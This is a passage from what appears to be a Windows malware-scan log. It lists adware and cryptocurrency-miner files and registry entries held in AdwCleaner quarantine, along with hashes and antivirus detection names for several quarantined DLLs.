         -0.8s C:\AdwCleaner\quarantine\files\ufcrmjfpytssofudwydmepawwumekcnb\voice\
         -0.8s C:\AdwCleaner\quarantine\files\ufcrmjfpytssofudwydmepawwumekcnb\voice\de\
         -0.8s C:\AdwCleaner\quarantine\files\ufcrmjfpytssofudwydmepawwumekcnb\voice\de\voice.wav
         -0.8s C:\ProgramData\NVIDIA\MessageBus_5528_0x667E90.log
         -0.7s C:\AdwCleaner\quarantine\files\bvchxdwshbwgukxjtndfphyxlvstjgkr\
         -0.7s C:\AdwCleaner\quarantine\files\bvchxdwshbwgukxjtndfphyxlvstjgkr\em.exe
         -0.6s C:\AdwCleaner\quarantine\files\bvchxdwshbwgukxjtndfphyxlvstjgkr\eng_em.ini
         -0.6s C:\AdwCleaner\quarantine\files\bvchxdwshbwgukxjtndfphyxlvstjgkr\French_em.ini
         -0.6s C:\AdwCleaner\quarantine\files\bvchxdwshbwgukxjtndfphyxlvstjgkr\German_em.ini
         -0.6s C:\AdwCleaner\quarantine\files\bvchxdwshbwgukxjtndfphyxlvstjgkr\ininotfound0.ini
         -0.6s C:\AdwCleaner\quarantine\files\bvchxdwshbwgukxjtndfphyxlvstjgkr\ininotfound2.ini
         -0.6s C:\AdwCleaner\quarantine\files\bvchxdwshbwgukxjtndfphyxlvstjgkr\isxdl.dll
         -0.6s C:\AdwCleaner\quarantine\files\bvchxdwshbwgukxjtndfphyxlvstjgkr\japan_em.ini
         -0.6s C:\AdwCleaner\quarantine\files\bvchxdwshbwgukxjtndfphyxlvstjgkr\log_02-12-2017.log
         -0.6s C:\AdwCleaner\quarantine\files\bvchxdwshbwgukxjtndfphyxlvstjgkr\log_02-13-2017.log
         -0.5s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\
         -0.4s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra-uninst.exe
         -0.4s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\
         -0.4s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\decredGeForce GTX 750 Tigw256l4tc4032.bin
         -0.4s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\gplyra.conf
         -0.4s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\gplyra.exe
         -0.4s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\msvcr120.dll
         -0.4s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\start.cmd
         -0.4s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\
         -0.4s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\aes_helper.cl
         -0.4s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\blake.cl
         -0.4s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\blake256.cl
         -0.4s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\bmw.cl
         -0.4s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\bmw256.cl
         -0.4s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\cubehash.cl
         -0.4s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\darkcoin-mod.cl
         -0.4s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\decred.cl
         -0.4s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\echo.cl
         -0.4s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\fugue.cl
         -0.4s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\groestl.cl
         -0.4s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\groestl256.cl
         -0.4s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\jh.cl
         -0.4s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\keccak.cl
         -0.4s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\keccak1600.cl
         -0.4s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\luffa.cl
         -0.4s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\lyra2.cl
         -0.4s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\lyra2re.cl
         -0.4s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\lyra2rev2.cl
         -0.4s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\lyra2v2.cl
         -0.4s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\neoscrypt.cl
         -0.4s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\shabal.cl
         -0.4s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\shavite.cl
         -0.4s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\simd.cl
         -0.4s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\skein.cl
         -0.4s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\skein256.cl
         -0.4s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\vanilla.cl
         -0.3s C:\AdwCleaner\quarantine\files\ooayadcdwhbjxeftcugzavjygjooooyj\
         -0.3s C:\AdwCleaner\quarantine\files\ooayadcdwhbjxeftcugzavjygjooooyj\WinSAP.dll
         -0.2s C:\AdwCleaner\quarantine\files\qshahttdnawtfesajygismqkeplwuzov\
         -0.2s C:\AdwCleaner\quarantine\files\qshahttdnawtfesajygismqkeplwuzov\WinSnare.dll
         -0.2s C:\AdwCleaner\quarantine\files\dbnpldzkbcknywexpmuzasbqpqchichu\
         -0.1s C:\AdwCleaner\quarantine\files\dbnpldzkbcknywexpmuzasbqpqchichu\GNUpdate\
         -0.1s C:\AdwCleaner\quarantine\files\dbnpldzkbcknywexpmuzasbqpqchichu\GNUpdate\sma.exe
         -0.1s C:\AdwCleaner\quarantine\files\dbnpldzkbcknywexpmuzasbqpqchichu\GNUpdate\smci32.dll
         -0.1s C:\AdwCleaner\quarantine\files\dbnpldzkbcknywexpmuzasbqpqchichu\GNUpdate\smci64.dll
         -0.1s C:\AdwCleaner\quarantine\files\dbnpldzkbcknywexpmuzasbqpqchichu\GNUpdate\smi32.exe
         -0.1s C:\AdwCleaner\quarantine\files\dbnpldzkbcknywexpmuzasbqpqchichu\GNUpdate\smi64.exe
         -0.1s C:\AdwCleaner\quarantine\files\dbnpldzkbcknywexpmuzasbqpqchichu\GNUpdate\smu.exe
         -0.1s C:\AdwCleaner\quarantine\files\dbnpldzkbcknywexpmuzasbqpqchichu\GNUpdate\SMUninstall.exe
         -0.1s C:\AdwCleaner\quarantine\files\dbnpldzkbcknywexpmuzasbqpqchichu\GNUpdate\smw.sys
         -0.1s C:\AdwCleaner\quarantine\files\dnvamrbyynolbnrjffyndvafsiefsaxe\
         -0.1s C:\AdwCleaner\quarantine\files\dnvamrbyynolbnrjffyndvafsiefsaxe\smhe.js
         -0.0s C:\AdwCleaner\quarantine\files\xhszhayleqmgttjapzldenwegvoihxsi\
         -0.0s C:\AdwCleaner\quarantine\files\xhszhayleqmgttjapzldenwegvoihxsi\Config.json
          0.0s C:\AdwCleaner\quarantine\files\xhszhayleqmgttjapzldenwegvoihxsi\set.exe
          0.0s C:\AdwCleaner\quarantine\files\xhszhayleqmgttjapzldenwegvoihxsi\set.exe.config
          0.0s C:\AdwCleaner\quarantine\files\xhszhayleqmgttjapzldenwegvoihxsi\System.Data.SQLite.dll
          0.0s C:\AdwCleaner\quarantine\files\xhszhayleqmgttjapzldenwegvoihxsi\System.Data.SQLite.Linq.dll
          0.0s C:\AdwCleaner\quarantine\files\xhszhayleqmgttjapzldenwegvoihxsi\System.Data.SQLite.xml
          0.0s C:\AdwCleaner\quarantine\files\xhszhayleqmgttjapzldenwegvoihxsi\X64\
          0.0s C:\AdwCleaner\quarantine\files\xhszhayleqmgttjapzldenwegvoihxsi\X64\SQLite.Interop.dll
          0.0s C:\AdwCleaner\quarantine\files\xhszhayleqmgttjapzldenwegvoihxsi\X86\
          0.0s C:\AdwCleaner\quarantine\files\xhszhayleqmgttjapzldenwegvoihxsi\X86\SQLite.Interop.dll
          0.1s C:\AdwCleaner\quarantine\files\fbbjasygkorzdwzozqncjlevzgqwxrph\
          0.1s C:\AdwCleaner\quarantine\files\fbbjasygkorzdwzozqncjlevzgqwxrph\ff.HP
          0.1s C:\AdwCleaner\quarantine\files\fbbjasygkorzdwzozqncjlevzgqwxrph\ff.NT
          0.1s C:\AdwCleaner\quarantine\files\fbbjasygkorzdwzozqncjlevzgqwxrph\snp.sc
          0.1s C:\AdwCleaner\quarantine\files\awmafxjwktdmzodqxohucbnfvwxfmcbx\
          0.2s C:\AdwCleaner\quarantine\files\awmafxjwktdmzodqxohucbnfvwxfmcbx\Config.xml
          0.2s C:\AdwCleaner\quarantine\files\awmafxjwktdmzodqxohucbnfvwxfmcbx\Nettrans.exe
          0.2s C:\AdwCleaner\quarantine\files\awmafxjwktdmzodqxohucbnfvwxfmcbx\Nettrans.exe.config
          0.2s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\
          0.2s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\Cofstock.exe
          0.2s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\Cofstock.exe.config
          0.2s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\conf.config
          0.2s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\Config.xml
          0.3s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\DanDubdom.bin
          0.3s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\Dong-Home.dll
          0.3s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\Fincore.exe
          0.3s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\Fincore.exe.config
          0.3s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\Freshing.dat
          0.3s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\Groovestrong.dat
          0.3s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\Hayzumflex.d.dat
          0.3s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\Hayzumflex.dat
          0.3s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\Hayzumflex.exe
          0.3s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\Hotlight.exe
          0.3s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\Hotlight.exe.config
          0.3s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\Jaystock.bin
          0.3s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\md.xml
          0.3s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\Ranzumstring.exe.config
          0.3s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\Singlestock.bin
          0.3s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\String-Tax.bin
          0.3s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\TrioDex.bin
          0.3s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\Triszap.dll
          0.3s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\uninstall.dat
          0.3s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\White-Fan.dat
          0.3s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\WhiteDox.bin
          0.3s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\ZamIng.bin
          0.3s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\ondemand\
          0.4s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\
          0.4s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Bluedax.bin
          0.4s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Cofstock.exe
          0.4s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Cofstock.exe.config
          0.4s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\conf.config
          0.4s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Config.xml
          0.4s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Driphotity.bin
          0.4s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Duosolodax.bin
          0.4s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Fasefax.bin
          0.4s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Hotjob.exe
          0.4s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Hotjob.exe.config
          0.4s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\HotSansoft.dat
          0.4s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\ItTone.dll
          0.4s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Lexitone.bin
          0.4s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\md.xml
          0.4s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Singlesoft.dat
          0.4s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Stockdax.dll
          0.4s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Tonin.bin
          0.4s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Tris-Ex.bin
          0.4s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\uninstall.dat
          0.4s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Ventokix.dat
          0.4s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Viafix.exe
          0.4s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Viafix.exe.config
          0.4s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Villa-Hold.exe.config
          0.4s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Zaamla.d.dat
          0.4s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Zaamla.dat
          0.4s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Zaamla.exe
          0.4s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\ondemand\
          0.5s C:\AdwCleaner\quarantine\files\yflfhzqpbpikflkejzzzmwhtzekagshh\
          0.5s C:\AdwCleaner\quarantine\files\yflfhzqpbpikflkejzzzmwhtzekagshh\ff.HP
          0.5s C:\AdwCleaner\quarantine\files\yflfhzqpbpikflkejzzzmwhtzekagshh\ff.NT
          0.5s C:\AdwCleaner\quarantine\files\yflfhzqpbpikflkejzzzmwhtzekagshh\snp.sc
          0.5s C:\AdwCleaner\quarantine\files\fbhcntlqzyoguexlgmesxwdbrjtmqwzd\
          0.5s C:\AdwCleaner\quarantine\files\fbhcntlqzyoguexlgmesxwdbrjtmqwzd\uninstaller.exe
          0.5s C:\AdwCleaner\quarantine\files\fbhcntlqzyoguexlgmesxwdbrjtmqwzd\uninstaller.exe.config
          0.6s C:\AdwCleaner\quarantine\files\ielbdbrbvweizniejjkegaonighxrfrb\
          0.6s C:\AdwCleaner\quarantine\files\ielbdbrbvweizniejjkegaonighxrfrb\MIO.exe
          0.6s C:\AdwCleaner\quarantine\files\ielbdbrbvweizniejjkegaonighxrfrb\loader\
          0.7s C:\AdwCleaner\quarantine\files\nyudvkpyrukdybolltvxchflegktvram\
          0.7s C:\AdwCleaner\quarantine\files\nyudvkpyrukdybolltvxchflegktvram\QQLive\
          0.7s C:\AdwCleaner\quarantine\files\nyudvkpyrukdybolltvxchflegktvram\QQLive\FailRecord.dat
          0.7s C:\AdwCleaner\quarantine\files\togtlznllkvxztobrgnmuzjlcxqmmboy\
          0.7s C:\AdwCleaner\quarantine\files\togtlznllkvxztobrgnmuzjlcxqmmboy\Profiles\
          0.7s C:\AdwCleaner\quarantine\files\togtlznllkvxztobrgnmuzjlcxqmmboy\Profiles\8rnx3iua.default\
          0.7s C:\AdwCleaner\quarantine\files\togtlznllkvxztobrgnmuzjlcxqmmboy\Profiles\8rnx3iua.default\prefs.js
          0.7s C:\AdwCleaner\quarantine\files\togtlznllkvxztobrgnmuzjlcxqmmboy\Profiles\8rnx3iua.default\profiles.ini
          0.7s C:\AdwCleaner\quarantine\files\togtlznllkvxztobrgnmuzjlcxqmmboy\Profiles\8rnx3iua.default\search.json.mozlz4
          0.8s C:\AdwCleaner\quarantine\files\vmyvkvouddwsanzcpfxrsjstzoesyukt\
          0.9s C:\AdwCleaner\quarantine\files\tkciylhxjmjrsbkzilrsksghwrxdouwq.back
          0.9s C:\AdwCleaner\quarantine\files\tzkoudrhqdrxzafwrmattbrwocwqewox.back
          0.9s C:\AdwCleaner\quarantine\files\nshnbphtlfdcaukurihucucbktvgrfuo.back
          0.9s C:\AdwCleaner\quarantine\files\lmegeqgwylgczmaugdncsoezrlfzdoow.back
          1.0s C:\AdwCleaner\quarantine\files\jidemsxupjpciijhzmqsoapuszhucfag.back
          1.0s C:\AdwCleaner\quarantine\files\hovlhcazljxzijuasrytdrtppuewtjam.back
          1.0s C:\AdwCleaner\quarantine\files\haajwoohpxztstxrtlhafsitfachjfmo.back
          1.0s C:\AdwCleaner\quarantine\files\apahvfitktjkzxvophzxcnioqbzksoqp.back
          1.1s C:\AdwCleaner\quarantine\files\fcvkhhaoafpnxinpxgtocpatvxdtiqvt.back
          1.1s C:\AdwCleaner\quarantine\files\evdtaqdoxakozjrppozslhkcjflrsund.back
          1.1s C:\AdwCleaner\quarantine\files\lrqkzkhhahecbbcndzqmcwucjlkucmif.back
          1.1s C:\AdwCleaner\quarantine\files\qekectrwctgkojzdhesvpgxwktxrjwbn.back
          1.2s C:\AdwCleaner\quarantine\files\xdheuyqjkchvboalodcocshwqpwapmas.back
          1.2s C:\AdwCleaner\quarantine\files\mkbhzixtozltywkkpgaztynbkuphdtdb.back
          1.2s C:\AdwCleaner\quarantine\files\pvosypxagsihssgnjyfyxcwezatewwum.back
          1.2s C:\AdwCleaner\quarantine\files\lqpsdbkmnkknxibvwwrsonrtakjijpzu.back
          1.3s C:\AdwCleaner\quarantine\files\smzcjlbrmvtqhfjhyginjshoqyjufruc.back
          1.3s C:\AdwCleaner\quarantine\files\damxwnvkbnzxtjfflsokifcgmotwrhpw.back
          1.3s C:\AdwCleaner\quarantine\files\virksncfeyszdlxcyurmcuhplcofsgcf.back
          1.3s C:\AdwCleaner\quarantine\files\glmtsyrtzckgrfjmnvaqymozloxekiil.back
          1.4s C:\AdwCleaner\quarantine\files\rzdkuelrbnuivrifmnklgfxvzzfrvetc.back
          1.4s C:\AdwCleaner\quarantine\files\uqtgfxjilungjdiyzwpzlmnwefohuhgy.back
          1.4s C:\AdwCleaner\quarantine\files\idflognkmdzjcvmbaecywvfxzubejjvu.back
          1.4s C:\AdwCleaner\quarantine\files\lqcgezgrlidhgtrhvxcomfelfgvdmvyt.back
          1.7s C:\AdwCleaner\quarantine\registry\reg_puhxbxsquvaobuhyfxejnebggtrfpdeq.reg
          1.8s C:\AdwCleaner\quarantine\registry\reg_tmimdswbkadtxhvqgdhuqpvbglcbmfdu.reg
          1.8s C:\AdwCleaner\quarantine\registry\reg_jdlnivjcusbkbrzcygoyhzspwyxlyggf.reg
          1.9s C:\AdwCleaner\quarantine\registry\reg_tfhkhetuluciyaeqriuqioeuyoypyxsy.reg
          1.9s C:\AdwCleaner\quarantine\registry\reg_elkwfsgmzobfidhvzhqpengxndnbnqrs.reg
          2.0s C:\AdwCleaner\quarantine\registry\reg_okibrbkxfqdrpthgjuptyhhyzfabxmei.reg
          2.0s C:\AdwCleaner\quarantine\registry\reg_wubsvososrzoldxnlntxwvkilyudnzeu.reg
          2.0s C:\AdwCleaner\quarantine\registry\reg_ldpgxoqehdbkeznqasdwthjtqljlfwbl.reg
          2.1s C:\AdwCleaner\quarantine\registry\reg_hoouldollkztgqhqkqlgbdtkjmjzbndm.reg
          2.1s C:\AdwCleaner\quarantine\registry\reg_tkndfadidnoselgvemeyjwzivzkdbfsi.reg
          2.2s C:\AdwCleaner\quarantine\registry\reg_dsvfxsmbfjqlgrtincrhckelkjmocsol.reg
          2.8s C:\AdwCleaner\quarantine\registry\reg_seqodqpqwkrfpncsawgyzpxawzputenw.reg
          2.8s C:\AdwCleaner\quarantine\registry\reg_icpltxjlklnkocbqgtzcggknkvebnjvv.reg
          2.9s C:\AdwCleaner\quarantine\registry\reg_gmmujjdiivebrljiqcjqctecrzmlbyoe.reg
          3.0s C:\AdwCleaner\quarantine\registry\reg_marasmtdffiyjsmfqktvvuzjrivxsool.reg
          3.1s C:\AdwCleaner\quarantine\registry\reg_cmqgxeamdfpuzwtxoepvczvloonypdwp.reg
          3.2s C:\AdwCleaner\quarantine\registry\reg_lyunspfrbhzgbwusmxmwbspblyhrulwy.reg
          3.3s C:\AdwCleaner\quarantine\registry\reg_lwqsugvxxjtyhoqpxtxtnpeygapjoxhm.reg
          3.4s C:\AdwCleaner\quarantine\registry\reg_pyvlcgypjrojemqatqyyrbrphjoxkdab.reg
          3.5s C:\AdwCleaner\quarantine\registry\reg_nhlqlirecitexubpkgzdofmsimewbpcz.reg
          3.5s C:\AdwCleaner\quarantine\registry\reg_xghjlxwlgaktwtkvamwqizmfzfhbckpp.reg
          3.7s C:\AdwCleaner\quarantine\registry\reg_zxsarcdkskpcuvedhjhhddlsqbgzdvzl.reg
          3.7s C:\AdwCleaner\quarantine\registry\reg_fxqtuaqoisrzsghbjocryzmwbqxxrjmj.reg
          3.8s C:\AdwCleaner\quarantine\registry\reg_ghlbbvjeqsokgnupaxajeyvokkfwkbnh.reg
          4.2s C:\AdwCleaner\quarantine\registry\reg_unkuocqomdygzgpxiizglrioehoicjtw.reg
          4.2s C:\AdwCleaner\quarantine\registry\reg_ecyvuvgkunhnpfrrpafwfcsnhgaoljbe.reg
          4.3s C:\AdwCleaner\quarantine\registry\reg_ekwhxwvhltpkcpkavxnduhlgzgslyema.reg
          4.3s C:\AdwCleaner\quarantine\registry\reg_eggguycnntdekswyvzoyybdcedlmfkjm.reg
          4.3s C:\AdwCleaner\quarantine\registry\reg_rcexoyuquzinpyavyncsanjofviavxjk.reg
          4.3s C:\AdwCleaner\quarantine\registry\reg_lpbfohsuttixwzckzjvtadqmofpumzjy.reg
          4.4s C:\AdwCleaner\quarantine\registry\reg_ydwyyidsknzaljhhqvwxrjwcxayioedb.reg
          4.4s C:\AdwCleaner\quarantine\registry\reg_pjqrynmploqoznlaxrdefubadvvlkzmm.reg
          4.4s C:\AdwCleaner\quarantine\registry\reg_daspbjyasdxdvwwwggsvvhrmzgxpnshh.reg
          4.5s C:\AdwCleaner\quarantine\registry\reg_cuetcglxejoqlxnssrmciebndydxhdrt.reg
          4.5s C:\AdwCleaner\quarantine\registry\reg_xurnwhaxeqtdzlbnzpjbokafxnxsiqum.reg
          4.5s C:\AdwCleaner\quarantine\registry\reg_tkqingwmwszmeptvclzuroubstvcckhw.reg
          4.6s C:\AdwCleaner\quarantine\registry\reg_mcoutunprxdphivyuvmoatwdyuxhyzwb.reg
          4.6s C:\AdwCleaner\quarantine\registry\reg_tgfeavmdtxngkczofnkyzphiqdfwhsfl.reg
          4.7s C:\AdwCleaner\quarantine\registry\reg_mhdzapqmugdydwjjqicquolddejvwqup.reg
          4.7s C:\AdwCleaner\quarantine\registry\reg_gzmkcboyfqzjhwapfhvqeofjaefhcttm.reg
          4.7s C:\AdwCleaner\quarantine\registry\reg_vazsqhuudufaewoypbfbikwgzqcgqfkc.reg
          4.8s C:\AdwCleaner\quarantine\registry\reg_lwugahqruqrqqjgikiohovxoculwwysx.reg
          4.8s C:\AdwCleaner\quarantine\registry\reg_xeczysjuynsfncsdctquwwgkbnofarzi.reg
          5.5s C:\AdwCleaner\quarantine\registry\reg_iioxwxczjbugugmwqmnueuszmpfqonbi.reg
          5.5s C:\AdwCleaner\quarantine\registry\reg_vrtdutftxfxohlxvramxkkrsqrnaioij.reg
          5.5s C:\AdwCleaner\quarantine\registry\reg_yvmqqvbcuamwvndvtdhefjuqlupmqiha.reg
          5.5s C:\AdwCleaner\quarantine\registry\reg_lwsnkfiuxbhfwjtitvqqzgtpowncmeix.reg
          5.5s C:\AdwCleaner\quarantine\registry\reg_fqcstvuljsuvdliaqoxcapwdameertol.reg
          5.5s C:\AdwCleaner\quarantine\registry\reg_ejsdpauzkeqyotivjhaivmsazspfnnay.reg
          5.6s C:\AdwCleaner\quarantine\registry\reg_yrdzjxchjfseqziayavxdwxeptdtlkom.reg
          5.6s C:\AdwCleaner\quarantine\registry\reg_peqwhjahmytfugksxniwczmpsseymesr.reg
          5.7s C:\AdwCleaner\quarantine\registry\reg_kiusmmvbvgzfcybhqmdrtdwqslscapcd.reg
          5.7s C:\AdwCleaner\quarantine\registry\reg_dtrxafqawoycuacbklvwcnjucjtvfqrq.reg
          5.8s C:\AdwCleaner\quarantine\registry\reg_mpldfxlkqddfqxemmzqxdxycwdwdxush.reg
          5.9s C:\AdwCleaner\quarantine\registry\reg_fiqaqrowoznmrtaduhmmjmdxvzunfivg.reg
          5.9s C:\AdwCleaner\quarantine\registry\reg_mmnettjvbtwenjqfrqilocfnkutzspil.reg
          6.1s C:\AdwCleaner\quarantine\registry\reg_diurulmulfktzboavnxvdildottqhhjx.reg
          6.1s C:\AdwCleaner\quarantine\registry\reg_xrqifbvohcnregydcpounrtfyrmjgmni.reg
          6.1s C:\AdwCleaner\quarantine\registry\reg_sjcuxpukaattukjmzpshxzvediwsgupz.reg
          6.8s C:\Windows\Prefetch\WUDFHOST.EXE-AFFEF87C.pf
          7.3s C:\Windows\System32\winevt\Logs\Microsoft-Windows-Winsock-WS2HELP%4Operational.evtx
          7.8s C:\Windows\Prefetch\NVDISPLAY.CONTAINER.EXE-98FFF787.pf
          8.0s C:\Windows\Prefetch\NVTELEMETRYCONTAINER.EXE-80BD8541.pf
         11.8s C:\Windows\Prefetch\SPOOLSV.EXE-D1F6B8B6.pf

   C:\FRST\Quarantine\C\Program Files (x86)\Druciy\CrashReport.dll
      Size . . . . . . . : 122.880 bytes
      Age  . . . . . . . : 1.0 days (2017-02-12 22:14:33)
      Entropy  . . . . . : 6.5
      SHA-256  . . . . . : 91B0A78864DA2EF1922BC17C01157E8208C7265500CE2D4CFFB54D53F3B45EA0
    > Bitdefender  . . . : Gen:Variant.Graftor.317626
      Fuzzy  . . . . . . : 108.0

   C:\FRST\Quarantine\C\Program Files (x86)\Druciy\Konoghstuqtainmodule.dll
      Size . . . . . . . : 154.624 bytes
      Age  . . . . . . . : 1.0 days (2017-02-12 22:14:33)
      Entropy  . . . . . : 6.5
      SHA-256  . . . . . : F392EB7C794A44632AA686206501F7F6640D359DDCBB8F2CF02A48930D9870A8
    > Bitdefender  . . . : Gen:Variant.Application.Elex.39
      Fuzzy  . . . . . . : 108.0

   C:\FRST\Quarantine\C\Program Files (x86)\Plidaing\CrashReport.dll
      Size . . . . . . . : 122.880 bytes
